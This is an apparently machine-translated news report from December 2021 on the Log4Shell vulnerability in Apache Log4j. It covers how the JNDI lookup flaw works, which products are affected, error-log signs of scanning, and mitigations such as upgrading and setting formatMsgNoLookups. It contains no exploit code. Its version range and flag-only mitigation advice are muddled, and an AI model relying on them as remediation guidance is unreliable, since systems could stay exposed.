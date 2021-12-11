An urgent update has arrived for Log4j: discovery indeed a zero day vulnerability that puts nearly all business applications running Java at risk of attack; various websites, applications and famous services comand Minecraft, iCloud, Twitter and Steam. The bug allows them to take control of their servers and clients, according to several security researchers. The threat was baptized precisely Log4j, named after the vulnerable library.

Log4j vulnerability

It is therefore the Apache Software Foundation that has released an emergency security update that fixes the 0-day vulnerability (labeled as CVE-2021-44228) in the popular Log4j log library, which is part of the Apache Logging Project. The patch was released as part of version 2.15.0.

The vulnerability was named Log4Shell and scored 10 out of 10 on the CVSS vulnerability rating scale. The bug allows remote unauthenticated code (RCE) execution. The problem is compounded by the fact that yesterday the cybersecurity researcher p0rz9 has already posted a PoC exploit on Twitter, showing that the vulnerability can be exploited remotely, and this also does not require special technical skills.

How Log4Shell works

Security company LunaSec describes how Log4Shell works on their blog saying that: The vulnerability forces Java based applications and servers using the Log4j library to log a specific line in their internal systems. When an application or server processes such logs, a string can cause a malicious script to be downloaded and executed on the vulnerable system from the attacker’s controlled domain. The result will be a complete hijack of the vulnerable application or server.

The sites and apps affected

The problem was originally discovered while searching for bugs on servers Minecraft, but Log4j is present in almost all business applications and servers Java.

For example, the library can be found in almost all enterprise products released by the Apache Software Foundation, including Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Flink, Apache Kafka, Apache Dubbo, and so on. Log4j is also actively used in various open source projects, including Redis, ElasticSearch, Elastic Logstash, Ghidra, and others.

Therefore, even companies using one of these products are indirectly vulnerable to Log4Shell attacks. Information security specialists are already reporting that solutions from giants like Apple (iCloud), Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase and probably thousands of other lesser-known companies could be vulnerable to Log4Shell.

Yesterday p0rz9 wrote that CVE-2021-44228 can only be exploited if the parameter log4j2.formatMsgNoLookups is set to false. The Record reports that, according to the company KnownSec 404 Team, in version 2.15.0 of Log4j this parameter is set to true, especially to prevent attacks. This means that Log4j users who have upgraded to version 2.15.0 and then set the flag to false they will again be vulnerable to attack. Furthermore, Log4j users who have not updated, but have set the flag to true, will still be able to block attacks even on previous versions without the update.

Unfortunately, this also means that all previous versions are at risk, where this parameter is set to false by default. That is, all previous versions of Log4j are vulnerable, starting with 2.10.0.

The details of the Log4j threat

Given that attackers normally use dnslog to scan the network before starting with the actual exploitation, it should be known that common ways of exploiting the vulnerability can be “javax.naming.CommunicationException” and “javax.naming.NamingException” in the error log application. Keywords to focus on: “Error looking up JNDI resource”.

How to update and mitigate the threat

If you are still not fully able to perform the update operation for your Apache application, it is recommended to add the following startup parameter of your Java Virtual Machine (jvm): -Dlog4j2.formatMsgNoLookups = true as shown on the image below:

Add the configuration file log4j2.component.properties in the application classpath, the contents of the file are: log4j2.formatMsgNoLookups = true

It is recommended to verify that the JDK is using at least version 11.0.1, 8u191, 7u201, 6u211 and later.

Looking to the future, Dustin Childs, Trend Micro’s Zero Day Initiative, said he was concerned that the impact of this vulnerability will continue in the coming months due to the large number of companies affected. If organizations are running a server based on open source software, there is a “good chance” that they will be affected by this vulnerability, he said.

“Since there is no definitive list of programs affected by this bug, we are likely to see this vulnerability for a while,” he said. “I wouldn’t be surprised if we find interesting programs in months or even years.”

